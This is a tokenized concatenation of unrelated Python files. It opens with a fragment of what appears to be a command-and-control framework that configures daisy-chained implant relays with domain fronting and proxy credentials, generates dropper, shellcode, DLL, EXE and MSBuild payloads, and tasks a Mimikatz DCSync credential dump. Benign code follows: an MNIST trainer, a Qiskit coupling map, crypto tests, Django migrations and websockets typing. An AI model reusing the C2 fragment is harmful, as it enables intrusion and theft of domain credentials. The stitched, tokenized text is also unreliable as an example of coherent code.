"+Colours.END)<line_sep>default_url=get_first_url(PayloadCommsHost DomainFrontHeader)<line_sep>default_df_header=get_first_dfheader(DomainFrontHeader)<if_stmt>default_df_header<eq>default_url<block_start>default_df_header=<none><block_end><if_stmt>firstdaisy.lower()<eq>"y"<or>firstdaisy<eq>""<block_start>upstream_url=input(Colours.GREEN+f"C2 URL (leave blank for {default_url}): "+Colours.END)<line_sep>domain_front=input(Colours.GREEN+f"Domain front header (leave blank for {str(default_df_header)}): "+Colours.END)<line_sep>proxy_user=input(Colours.GREEN+"Proxy user (<domain>\\<username>, leave blank if none): "+Colours.END)<line_sep>proxy_pass=input(Colours.GREEN+"Proxy password (leave blank if none): "+Colours.END)<line_sep>proxy_url=input(Colours.GREEN+"Proxy URL (leave blank if none): "+Colours.END)<line_sep>cred_expiry=input(Colours.GREEN+"Password/Account Expiration Date: .e.g. 
15/03/2018: ")<if_stmt><not>upstream_url<block_start>upstream_url=default_url<block_end><if_stmt><not>domain_front<block_start><if_stmt>default_df_header<block_start>domain_front=default_df_header<block_end><else_stmt><block_start>domain_front=""<block_end><block_end><block_end><else_stmt><block_start>upstream_daisy_host=input(Colours.GREEN+"Upstream daisy server: "+Colours.END)<line_sep>upstream_daisy_port=input(Colours.GREEN+"Upstream daisy port: "+Colours.END)<line_sep>upstream_url=f"http://{upstream_daisy_host}:{upstream_daisy_port}"<line_sep>domain_front=upstream_daisy_host<block_end>urls=get_allurls().replace(" " "")<line_sep>useragent=UserAgent<line_sep>command=f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"<line_sep>new_task(command user randomuri)<line_sep>update_label("DaisyHost" randomuri)<line_sep>createpayloads=input(Colours.GREEN+"Would you like to create payloads for this Daisy Server? Y/n ")<if_stmt>createpayloads.lower()<eq>"y"<or>createpayloads<eq>""<block_start>name=input(Colours.GREEN+"Enter a payload name: "+Colours.END)<line_sep>daisyhost=get_implantdetails(randomuri)<line_sep>proxynone="if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"<line_sep>C2=get_c2server_all()<line_sep>urlId=new_urldetails(name f"\"http://{bind_ip}:{bind_port}\"" "\"\"" proxy_url proxy_user proxy_pass cred_expiry)<line_sep>newPayload=Payloads(C2.KillDate C2.EncKey C2.Insecure C2.UserAgent C2.Referrer "%s?d"%get_newimplanturl() PayloadsDirectory PowerShellProxyCommand=proxynone URLID=urlId)<line_sep>newPayload.PSDropper=(newPayload.PSDropper).replace("$pid;%s"%(upstream_url) "$pid;%s@%s"%(daisyhost.User daisyhost.Domain))<line_sep>newPayload.CreateDroppers(name)<line_sep>newPayload.CreateRaw(name)<line_sep>newPayload.CreateDlls(name)<line_sep>newPayload.CreateShellcode(name)<line_sep>newPayload.CreateDonutShellcode(name)<line_sep>newPayload.CreateEXE(name)<line_sep>newPayload.CreateMsbuild(name)<line_sep>print_good("Created new %s daisy payloads"%name)<block_end><block_end><def_stmt>do_dcsync user command randomuri<block_start>params=re.compile("dcsync " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>res=params.split()<line_sep>domain=res[0]<line_sep>dcsync_user=res[1]<line_sep>new_task(f"run-dll SharpSploit.Credentials.Mimikatz SharpSploit Command \"\\\"lsadump::dcsync /domain:{domain} /user:{dcsync_user}\\\"\"" user randomuri)<block_end>
<import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>gzip<import_stmt>json<import_stmt>logging<import_stmt>os<import_stmt>traceback<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.keras Model<import_from_stmt>tensorflow.keras.layers Conv2D Dense Flatten<line_sep>logging.basicConfig(level=logging.DEBUG)<line_sep># Define the model object <class_stmt>SmallConv(Model)<block_start><def_stmt>__init__ self<block_start>super(SmallConv self).__init__()<line_sep>self.conv1=Conv2D(32 3 activation="relu")<line_sep>self.flatten=Flatten()<line_sep>self.d1=Dense(128 activation="relu")<line_sep>self.d2=Dense(10)<block_end><def_stmt>call self x<block_start>x=self.conv1(x)<line_sep>x=self.flatten(x)<line_sep>x=self.d1(x)<line_sep><return>self.d2(x)<block_end><block_end># Decode and preprocess data <def_stmt>convert_to_numpy data_dir images_file labels_file<block_start>"""Byte string to numpy arrays"""<with_stmt>gzip.open(os.path.join(data_dir images_file) "rb")<as>f<block_start>images=np.frombuffer(f.read() np.uint8 offset=16).reshape(-1 28 28)<block_end><with_stmt>gzip.open(os.path.join(data_dir labels_file) "rb")<as>f<block_start>labels=np.frombuffer(f.read() np.uint8 offset=8)<block_end><return>(images labels)<block_end><def_stmt>mnist_to_numpy data_dir train<block_start>"""Load raw MNIST data into numpy array Args: data_dir (str): directory of MNIST raw data. This argument can be accessed via SM_CHANNEL_TRAINING train (bool): use training data Returns: tuple of images and labels as numpy array """<if_stmt>train<block_start>images_file="train-images-idx3-ubyte.gz"<line_sep>labels_file="train-labels-idx1-ubyte.gz"<block_end><else_stmt><block_start>images_file="t10k-images-idx3-ubyte.gz"<line_sep>labels_file="t10k-labels-idx1-ubyte.gz"<block_end><return>convert_to_numpy(data_dir images_file labels_file)<block_end><def_stmt>normalize x axis<block_start>eps=np.finfo(float).eps<line_sep>mean=np.mean(x axis=axis keepdims=<true>)<line_sep># avoid division by zero std=np.std(x axis=axis keepdims=<true>)+eps<line_sep><return>(x-mean)/std<block_end># Training logic <def_stmt>train args# create data loader from the train / test channels <block_start>x_train,y_train=mnist_to_numpy(data_dir=args.train train=<true>)<line_sep>x_test,y_test=mnist_to_numpy(data_dir=args.test train=<false>)<line_sep>x_train,x_test=x_train.astype(np.float32) x_test.astype(np.float32)<line_sep># normalize the inputs to mean 0 and std 1 x_train,x_test=normalize(x_train (1 2)) normalize(x_test (1 2))<line_sep># expand channel axis # tf uses depth minor convention x_train,x_test=np.expand_dims(x_train axis=3) np.expand_dims(x_test axis=3)<line_sep># normalize the data to mean 0 and std 1 train_loader=(tf.data.Dataset.from_tensor_slices((x_train y_train)).shuffle(len(x_train)).batch(args.batch_size))<line_sep>test_loader=tf.data.Dataset.from_tensor_slices((x_test y_test)).batch(args.batch_size)<line_sep>model=SmallConv()<line_sep>model.compile()<line_sep>loss_fn=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=<true>)<line_sep>optimizer=tf.keras.optimizers.Adam(learning_rate=args.learning_rate beta_1=args.beta_1 beta_2=args.beta_2)<line_sep>train_loss=tf.keras.metrics.Mean(name="train_loss")<line_sep>train_accuracy=tf.keras.metrics.SparseCategoricalAccuracy(name="train_accuracy")<line_sep>test_loss=tf.keras.metrics.Mean(name="test_loss")<line_sep>test_accuracy=tf.keras.metrics.SparseCategoricalAccuracy(name="test_accuracy")<line_sep>@tf.function<def_stmt>train_step images 
labels<block_start><with_stmt>tf.GradientTape()<as>tape<block_start>predictions=model(images training=<true>)<line_sep>loss=loss_fn(labels predictions)<block_end>grad=tape.gradient(loss model.trainable_variables)<line_sep>optimizer.apply_gradients(zip(grad model.trainable_variables))<line_sep>train_loss(loss)<line_sep>train_accuracy(labels predictions)<line_sep><return><block_end>@tf.function<def_stmt>test_step images labels<block_start>predictions=model(images training=<false>)<line_sep>t_loss=loss_fn(labels predictions)<line_sep>test_loss(t_loss)<line_sep>test_accuracy(labels predictions)<line_sep><return><block_end>print("Training starts ...")<for_stmt>epoch range(args.epochs)<block_start>train_loss.reset_states()<line_sep>train_accuracy.reset_states()<line_sep>test_loss.reset_states()<line_sep>test_accuracy.reset_states()<for_stmt>batch,(images labels) enumerate(train_loader)<block_start>train_step(images labels)<block_end><for_stmt>images,labels test_loader<block_start>test_step(images labels)<block_end>print(f"Epoch {epoch+1}, "<concat>f"Loss: {train_loss.result()}, "<concat>f"Accuracy: {train_accuracy.result()<times>100}, "<concat>f"Test Loss: {test_loss.result()}, "<concat>f"Test Accuracy: {test_accuracy.result()<times>100}")<block_end># Save the model # A version number is needed for the serving container # to load the model version="00000000"<line_sep>ckpt_dir=os.path.join(args.model_dir version)<if_stmt><not>os.path.exists(ckpt_dir)<block_start>os.makedirs(ckpt_dir)<block_end>model.save(ckpt_dir)<line_sep><return><block_end><def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--batch-size" type=int default=32)<line_sep>parser.add_argument("--epochs" type=int default=1)<line_sep>parser.add_argument("--learning-rate" type=float default=1e-3)<line_sep>parser.add_argument("--beta_1" type=float default=0.9)<line_sep>parser.add_argument("--beta_2" type=float default=0.999)<line_sep># Environment variables given by the training image parser.add_argument("--model-dir" type=str default=os.environ["SM_MODEL_DIR"])<line_sep>parser.add_argument("--train" type=str default=os.environ["SM_CHANNEL_TRAINING"])<line_sep>parser.add_argument("--test" type=str default=os.environ["SM_CHANNEL_TESTING"])<line_sep>parser.add_argument("--current-host" type=str default=os.environ["SM_CURRENT_HOST"])<line_sep>parser.add_argument("--hosts" type=list default=json.loads(os.environ["SM_HOSTS"]))<line_sep><return>parser.parse_args()<block_end><if_stmt>__name__<eq>"__main__"<block_start>args=parse_args()<line_sep>train(args)<block_end>
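# --- Illustrative sketch added by the editor; not part of the training script above. ---
# parse_args() reads its defaults from the SageMaker environment variables
# SM_MODEL_DIR, SM_CHANNEL_TRAINING, SM_CHANNEL_TESTING, SM_CURRENT_HOST and SM_HOSTS.
# For a quick local smoke test those variables can be set by hand before invoking the
# script; "train.py" and the ./data and /tmp/model paths below are placeholders, and
# the MNIST .gz files must already be present in the training/testing directories.
import os
import subprocess

env = dict(
    os.environ,
    SM_MODEL_DIR="/tmp/model",
    SM_CHANNEL_TRAINING="./data",   # must contain train-images-idx3-ubyte.gz etc.
    SM_CHANNEL_TESTING="./data",    # must contain t10k-images-idx3-ubyte.gz etc.
    SM_CURRENT_HOST="localhost",
    SM_HOSTS='["localhost"]',
)
subprocess.run(["python", "train.py", "--epochs", "1", "--batch-size", "32"], env=env, check=True)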
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ Directed graph object for representing coupling between physical qubits. The nodes of the graph correspond to physical qubits (represented as integers) and the directed edges indicate which physical qubits are coupled and the permitted direction of CNOT gates. The object has a distance function that can be used to map quantum circuits onto a device with this coupling. """<import_stmt>io<import_stmt>warnings<import_stmt>numpy<as>np<import_stmt>retworkx<as>rx<import_from_stmt>qiskit.transpiler.exceptions CouplingError<import_from_stmt>qiskit.exceptions MissingOptionalLibraryError<class_stmt>CouplingMap<block_start>""" Directed graph specifying fixed coupling. Nodes correspond to physical qubits (integers) and directed edges correspond to permitted CNOT gates """<line_sep>__slots__=("description" "graph" "_dist_matrix" "_qubit_list" "_size" "_is_symmetric")<def_stmt>__init__ self couplinglist=<none> description=<none><block_start>""" Create coupling graph. By default, the generated coupling has no nodes. Args: couplinglist (list or None): An initial coupling graph, specified as an adjacency list containing couplings, e.g. [[0,1], [0,2], [1,2]]. It is required that nodes are contiguously indexed starting at 0. Missed nodes will be added as isolated nodes in the coupling map. description (str): A string to describe the coupling map. """<line_sep>self.description=description<line_sep># the coupling map graph self.graph=rx.PyDiGraph()<line_sep># a dict of dicts from node pairs to distances self._dist_matrix=<none><line_sep># a sorted list of physical qubits (integers) in this coupling map self._qubit_list=<none><line_sep># number of qubits in the graph self._size=<none><line_sep>self._is_symmetric=<none><if_stmt>couplinglist<is><not><none><block_start>self.graph.extend_from_edge_list([tuple(x)<for>x couplinglist])<block_end><block_end><def_stmt>size self<block_start>"""Return the number of physical qubits in this graph."""<if_stmt>self._size<is><none><block_start>self._size=len(self.graph)<block_end><return>self._size<block_end><def_stmt>get_edges self<block_start>""" Gets the list of edges in the coupling graph. Returns: Tuple(int,int): Each edge is a pair of physical qubits. """<line_sep><return>self.graph.edge_list()<block_end><def_stmt>add_physical_qubit self physical_qubit<block_start>"""Add a physical qubit to the coupling graph as a node. physical_qubit (int): An integer representing a physical qubit. Raises: CouplingError: if trying to add duplicate qubit """<if_stmt><not>isinstance(physical_qubit int)<block_start><raise>CouplingError("Physical qubits should be integers.")<block_end><if_stmt>physical_qubit<in>self.physical_qubits<block_start><raise>CouplingError("The physical qubit %s is already in the coupling graph"%physical_qubit)<block_end>self.graph.add_node(physical_qubit)<line_sep>self._dist_matrix=<none># invalidate self._qubit_list=<none># invalidate self._size=<none><block_end># invalidate <def_stmt>add_edge self src dst<block_start>""" Add directed edge to coupling graph. 
src (int): source physical qubit dst (int): destination physical qubit """<if_stmt>src<not><in>self.physical_qubits<block_start>self.add_physical_qubit(src)<block_end><if_stmt>dst<not><in>self.physical_qubits<block_start>self.add_physical_qubit(dst)<block_end>self.graph.add_edge(src dst <none>)<line_sep>self._dist_matrix=<none># invalidate self._is_symmetric=<none><block_end># invalidate <def_stmt>subgraph self nodelist<block_start>"""Return a CouplingMap object for a subgraph of self. nodelist (list): list of integer node labels """<line_sep>warnings.warn("The .subgraph() method is deprecated and will be removed in a "<concat>"future release. Instead the .reduce() method should be used "<concat>"instead which does the same thing but preserves nodelist order." DeprecationWarning stacklevel=2 )<line_sep>subcoupling=CouplingMap()<line_sep>subcoupling.graph=self.graph.subgraph(nodelist)<line_sep><return>subcoupling<block_end>@property<def_stmt>physical_qubits self<block_start>"""Returns a sorted list of physical_qubits"""<if_stmt>self._qubit_list<is><none><block_start>self._qubit_list=self.graph.node_indexes()<block_end><return>self._qubit_list<block_end><def_stmt>is_connected self<block_start>""" Test if the graph is connected. Return True if connected, False otherwise """<try_stmt><block_start><return>rx.is_weakly_connected(self.graph)<block_end><except_stmt>rx.NullGraph<block_start><return><false><block_end><block_end><def_stmt>neighbors self physical_qubit<block_start>"""Return the nearest neighbors of a physical qubit. Directionality matters, i.e. a neighbor must be reachable by going one hop in the direction of an edge. """<line_sep><return>self.graph.neighbors(physical_qubit)<block_end>@property<def_stmt>distance_matrix self<block_start>"""Return the distance matrix for the coupling map."""<line_sep>self.compute_distance_matrix()<line_sep><return>self._dist_matrix<block_end><def_stmt>compute_distance_matrix self<block_start>"""Compute the full distance matrix on pairs of nodes. The distance map self._dist_matrix is computed from the graph using all_pairs_shortest_path_length. This is normally handled internally by the :attr:`~qiskit.transpiler.CouplingMap.distance_matrix` attribute or the :meth:`~qiskit.transpiler.CouplingMap.distance` method but can be called if you're accessing the distance matrix outside of those or want to pre-generate it. """<if_stmt>self._dist_matrix<is><none><block_start><if_stmt><not>self.is_connected()<block_start><raise>CouplingError("coupling graph not connected")<block_end>self._dist_matrix=rx.digraph_distance_matrix(self.graph as_undirected=<true>)<block_end><block_end><def_stmt>distance self physical_qubit1 physical_qubit2<block_start>"""Returns the undirected distance between physical_qubit1 and physical_qubit2. Args: physical_qubit1 (int): A physical qubit physical_qubit2 (int): Another physical qubit Returns: int: The undirected distance Raises: CouplingError: if the qubits do not exist in the CouplingMap """<if_stmt>physical_qubit1<ge>self.size()<block_start><raise>CouplingError("%s not in coupling graph"%physical_qubit1)<block_end><if_stmt>physical_qubit2<ge>self.size()<block_start><raise>CouplingError("%s not in coupling graph"%physical_qubit2)<block_end>self.compute_distance_matrix()<line_sep><return>int(self._dist_matrix[physical_qubit1 physical_qubit2])<block_end><def_stmt>shortest_undirected_path self physical_qubit1 physical_qubit2<block_start>"""Returns the shortest undirected path between physical_qubit1 and physical_qubit2. 
Args: physical_qubit1 (int): A physical qubit physical_qubit2 (int): Another physical qubit Returns: List: The shortest undirected path Raises: CouplingError: When there is no path between physical_qubit1, physical_qubit2. """<line_sep>paths=rx.digraph_dijkstra_shortest_paths(self.graph source=physical_qubit1 target=physical_qubit2 as_undirected=<true>)<if_stmt><not>paths<block_start><raise>CouplingError(f"Nodes {str(physical_qubit1)} and {str(physical_qubit2)} are not connected")<block_end><return>paths[physical_qubit2]<block_end>@property<def_stmt>is_symmetric self<block_start>""" Test if the graph is symmetric. Return True if symmetric, False otherwise """<if_stmt>self._is_symmetric<is><none><block_start>self._is_symmetric=self._check_symmetry()<block_end><return>self._is_symmetric<block_end><def_stmt>make_symmetric self<block_start>""" Convert uni-directional edges into bi-directional. """<line_sep>edges=self.get_edges()<for_stmt>src,dest edges<block_start><if_stmt>(dest src)<not><in>edges<block_start>self.add_edge(dest src)<block_end><block_end>self._dist_matrix=<none># invalidate self._is_symmetric=<none><block_end># invalidate <def_stmt>_check_symmetry self<block_start>""" Calculates symmetry Returns: Bool: True if symmetric, False otherwise """<line_sep><return>self.graph.is_symmetric()<block_end><def_stmt>reduce self mapping<block_start>"""Returns a reduced coupling map that corresponds to the subgraph of qubits selected in the mapping. Args: mapping (list): A mapping of reduced qubits to device qubits. Returns: CouplingMap: A reduced coupling_map for the selected qubits. Raises: CouplingError: Reduced coupling map must be connected. """<import_from_stmt>scipy.sparse coo_matrix csgraph<line_sep>reduced_qubits=len(mapping)<line_sep>inv_map=[<none>]<times>(max(mapping)+1)<for_stmt>idx,val enumerate(mapping)<block_start>inv_map[val]=idx<block_end>reduced_cmap=[]<for_stmt>edge self.get_edges()<block_start><if_stmt>edge[0]<in>mapping<and>edge[1]<in>mapping<block_start>reduced_cmap.append([inv_map[edge[0]] inv_map[edge[1]]])<block_end><block_end># Verify coupling_map is connected rows=np.array([edge[0]<for>edge reduced_cmap] dtype=int)<line_sep>cols=np.array([edge[1]<for>edge reduced_cmap] dtype=int)<line_sep>data=np.ones_like(rows)<line_sep>mat=coo_matrix((data (rows cols)) shape=(reduced_qubits reduced_qubits)).tocsr()<if_stmt>csgraph.connected_components(mat)[0]<ne>1<block_start><raise>CouplingError("coupling_map must be connected.")<block_end><return>CouplingMap(reduced_cmap)<block_end>@classmethod<def_stmt>from_full cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a fully connected coupling map on n qubits."""<line_sep>cmap=cls(description="full")<if_stmt>bidirectional<block_start>cmap.graph=rx.generators.directed_mesh_graph(num_qubits)<block_end><else_stmt><block_start>edge_list=[]<for_stmt>i range(num_qubits)<block_start><for_stmt>j range(i)<block_start>edge_list.append((j i))<block_end><block_end>cmap.graph.extend_from_edge_list(edge_list)<block_end><return>cmap<block_end>@classmethod<def_stmt>from_line cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of n qubits connected in a line."""<line_sep>cmap=cls(description="line")<line_sep>cmap.graph=rx.generators.directed_path_graph(num_qubits bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_ring cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of n qubits connected to each of 
their neighbors in a ring."""<line_sep>cmap=cls(description="ring")<line_sep>cmap.graph=rx.generators.directed_cycle_graph(num_qubits bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_grid cls num_rows num_columns bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of qubits connected on a grid of num_rows x num_columns."""<line_sep>cmap=cls(description="grid")<line_sep>cmap.graph=rx.generators.directed_grid_graph(num_rows num_columns bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_heavy_hex cls distance bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a heavy hexagon graph coupling map. A heavy hexagon graph is described in: https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022 Args: distance (int): The code distance for the generated heavy hex graph. The value for distance can be any odd positive integer. The distance relates to the number of qubits by: :math:`n = \\frac{5d^2 - 2d - 1}{2}` where :math:`n` is the number of qubits and :math:`d` is the ``distance`` parameter. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. By default this is set to ``True`` Returns: CouplingMap: A heavy hex coupling graph """<line_sep>cmap=cls(description="heavy-hex")<line_sep>cmap.graph=rx.generators.directed_heavy_hex_graph(distance bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_heavy_square cls distance bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a heavy square graph coupling map. A heavy square graph is described in: https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022 Args: distance (int): The code distance for the generated heavy square graph. The value for distance can be any odd positive integer. The distance relates to the number of qubits by: :math:`n = 3d^2 - 2d` where :math:`n` is the number of qubits and :math:`d` is the ``distance`` parameter. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. By default this is set to ``True`` Returns: CouplingMap: A heavy square coupling graph """<line_sep>cmap=cls(description="heavy-square")<line_sep>cmap.graph=rx.generators.directed_heavy_square_graph(distance bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_hexagonal_lattice cls rows cols bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a hexagonal lattice graph coupling map. Args: rows (int): The number of rows to generate the graph with. cols (int): The number of columns to generate the graph with. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. 
By default this is set to ``True`` Returns: CouplingMap: A hexagonal lattice coupling graph """<line_sep>cmap=cls(description="hexagonal-lattice")<line_sep>cmap.graph=rx.generators.directed_hexagonal_lattice_graph(rows cols bidirectional=bidirectional)<line_sep><return>cmap<block_end><def_stmt>largest_connected_component self<block_start>"""Return a set of qubits in the largest connected component."""<line_sep><return>max(rx.weakly_connected_components(self.graph) key=len)<block_end><def_stmt>__str__ self<block_start>"""Return a string representation of the coupling graph."""<line_sep>string=""<if_stmt>self.get_edges()<block_start>string<augadd>"["<line_sep>string<augadd>", ".join([f"[{src}, {dst}]"<for>(src dst) self.get_edges()])<line_sep>string<augadd>"]"<block_end><return>string<block_end><def_stmt>draw self<block_start>"""Draws the coupling map. This function needs `pydot <https://github.com/erocarrera/pydot>`_, which in turn needs `Graphviz <https://www.graphviz.org/>`_ to be installed. Additionally, `pillow <https://python-pillow.org/>`_ will need to be installed. Returns: PIL.Image: Drawn coupling map. Raises: MissingOptionalLibraryError: when pydot or pillow are not installed. """<try_stmt><block_start><import_stmt>pydot<block_end><except_stmt>ImportError<as>ex<block_start><raise>MissingOptionalLibraryError(libname="pydot" name="coupling map drawer" pip_install="pip install pydot" )<from>ex<block_end><try_stmt><block_start><import_from_stmt>PIL Image<block_end><except_stmt>ImportError<as>ex<block_start><raise>MissingOptionalLibraryError(libname="pillow" name="coupling map drawer" pip_install="pip install pillow" )<from>ex<block_end>dot_str=self.graph.to_dot()<line_sep>dot=pydot.graph_from_dot_data(dot_str)[0]<line_sep>png=dot.create_png(prog="neato")<line_sep><return>Image.open(io.BytesIO(png))<block_end><block_end>
<import_stmt>json<import_stmt>pytest<import_from_stmt>indy crypto error<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_authcrypt_works wallet_handle identity_my1 identity_steward1 pack_message# setup keys <block_start>_,sender_vk=identity_my1<line_sep>_,steward_vk=identity_steward1<line_sep>recipient_verkeys=[steward_vk]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys sender_vk)<line_sep>unpacked_message=<await>crypto.unpack_message(wallet_handle packed_message)<line_sep># test function unpacked_message_json=json.loads(unpacked_message.decode("utf-8"))<assert_stmt>unpacked_message_json['message']<eq>pack_message<assert_stmt>unpacked_message_json['recipient_verkey']<eq>steward_vk<assert_stmt>unpacked_message_json['sender_verkey']<eq>sender_vk<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_anoncrypt_works wallet_handle identity_steward1 pack_message# setup keys <block_start>_,steward_vk=identity_steward1<line_sep>recipient_verkeys=[steward_vk]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys <none>)<line_sep>unpacked_message=<await>crypto.unpack_message(wallet_handle packed_message)<line_sep># test function unpacked_message_json=json.loads(unpacked_message.decode("utf-8"))<assert_stmt>unpacked_message_json['message']<eq>pack_message<assert_stmt>unpacked_message_json['recipient_verkey']<eq>steward_vk<assert_stmt>'sender_verkey'<not><in>unpacked_message_json<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_missing_verkey wallet_handle identity_my1 verkey_my2 pack_message# setup keys <block_start>_,sender_vk=identity_my1<line_sep>recipient_verkeys=[verkey_my2]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys sender_vk)<with_stmt>pytest.raises(error.WalletItemNotFound)<block_start><await>crypto.unpack_message(wallet_handle packed_message)<block_end><block_end>
# -*- coding: utf-8 -*- # Generated by Django 1.9.5 on 2016-04-14 21:18 <import_from_future_stmt> unicode_literals<import_stmt>django.utils.timezone<import_from_stmt>django.db migrations<import_from_stmt>django.db models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('orchestra' '0036_remove_taskassignment_snapshots') ]<line_sep>operations=[migrations.AddField(model_name='iteration' name='created_at' field=models.DateTimeField(default=django.utils.timezone.now) ) migrations.AddField(model_name='iteration' name='is_deleted' field=models.BooleanField(default=<false>) ) ]<block_end>
# -*- coding: utf-8 -*- u"""Utils module for SecureTea Social Engineering. Project: ╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐ ╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤ ╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴ Author: <NAME> <<EMAIL>> , Aug 6 2020 Version: 2.1 Module: SecureTea """<import_stmt>re<def_stmt>check_valid_email email<block_start>""" Check whether the email string is valid or not Args: email : email id Raises: None Returns: bool: True if valid, else False """<line_sep>regex_std_mails=r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$"<line_sep>regex_custom_mails=r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$"<line_sep><return>re.search(regex_std_mails email)<or>re.search(regex_custom_mails email)<block_end>
# Generated by Django 3.1.3 on 2020-11-29 09:12 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("autotasks" "0008_auto_20201030_1515") ]<line_sep>operations=[migrations.AddField(model_name="automatedtask" name="run_time_bit_weekdays" field=models.IntegerField(blank=<true> null=<true>) ) ]<block_end>
<import_from_stmt>typing List NewType Optional Tuple Union<line_sep>__all__=["Data" "Origin" "ExtensionHeader" "ExtensionParameter" "Subprotocol"]<line_sep>Data=Union[str bytes]<line_sep>Data__doc__=""" Types supported in a WebSocket message: - :class:`str` for text messages - :class:`bytes` for binary messages """<line_sep># Remove try / except when dropping support for Python < 3.7 <try_stmt><block_start>Data.__doc__=Data__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>Origin=NewType("Origin" str)<line_sep>Origin.__doc__="""Value of an Origin header"""<line_sep>ExtensionName=NewType("ExtensionName" str)<line_sep>ExtensionName.__doc__="""Name of a WebSocket extension"""<line_sep>ExtensionParameter=Tuple[str Optional[str]]<line_sep>ExtensionParameter__doc__="""Parameter of a WebSocket extension"""<try_stmt><block_start>ExtensionParameter.__doc__=ExtensionParameter__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>ExtensionHeader=Tuple[ExtensionName List[ExtensionParameter]]<line_sep>ExtensionHeader__doc__="""Item parsed in a Sec-WebSocket-Extensions header"""<try_stmt><block_start>ExtensionHeader.__doc__=ExtensionHeader__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>Subprotocol=NewType("Subprotocol" str)<line_sep>Subprotocol.__doc__="""Items parsed in a Sec-WebSocket-Protocol header"""<line_sep>
<import_stmt>unittest<import_from_stmt>rising AbstractMixin<class_stmt>Abstract(object)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__()<line_sep>self.abstract=<true><block_end><block_end><class_stmt>AbstractForward(object)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__(**kwargs)<line_sep>self.abstract=<true><block_end><block_end><class_stmt>PreMix(AbstractMixin Abstract)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>PostMix(AbstractForward AbstractMixin)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>MyTestCase(unittest.TestCase)<block_start><def_stmt>test_pre_mix self<block_start>obj=PreMix(a=<true>)<line_sep>self.assertFalse(hasattr(obj "a"))<line_sep>self.assertTrue(obj.abstract)<block_end><def_stmt>test_post_mix self<block_start>obj=PostMix(a=<true>)<line_sep>self.assertTrue(obj.a)<line_sep>self.assertTrue(obj.abstract)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
